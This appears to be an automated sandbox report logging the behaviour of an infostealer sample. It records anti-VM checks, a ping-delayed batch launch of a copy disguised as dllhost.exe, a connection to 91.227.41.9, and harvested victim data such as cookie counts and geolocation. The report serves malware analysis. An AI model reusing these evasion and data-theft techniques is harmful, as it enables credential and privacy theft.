Source: C:\Users\Public\Libraries\dllhost.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 599859	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 597062	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 596421	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 594921	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 594343	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 594093	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 593796	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 593515	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 593203	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 592765	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 591937	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 591593	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 591296	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 591071	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 590765	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 590390	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 590078	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 589593	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 589234	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 588996	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 588765	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 588375	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 588093	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 587894	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 587765	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 587656	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 587535	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 587406	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 587296	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 587181	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Thread delayed: delay time: 587062	Jump to behavior

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: eu6OEBpBCI.exe, 00000000.00000002.1711981527.000000001B8EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: dllhost.exe, 00000005.00000002.4150561685.000000001C470000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\Public\Libraries\dllhost.exe

Network Connect: 91.227.41.9 80

Jump to behavior

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VE9VyBa20L.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\dllhost.exe "C:\Users\Public\Libraries\dllhost.exe"	Jump to behavior

Source: dllhost.exe, 00000005.00000002.4103094451.0000000003281000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 5.0.4",5,1,"","user","128757","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\Public\\Libraries","F6WLAH (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.228","US / United States",
Source: dllhost.exe, 00000005.00000002.4103094451.0000000003281000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4103094451.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.4103094451.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: dllhost.exe, 00000005.00000002.4103094451.0000000003281000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"550","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"206"},"5.0.4",5,1,"","user","128757","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\Public\\Libraries","F6WLAH (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.228","US / United States","New York / New York","40.7123 / -74.0068"]

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Queries volume information: C:\Users\user\Desktop\eu6OEBpBCI.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Users\Public\Libraries\dllhost.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
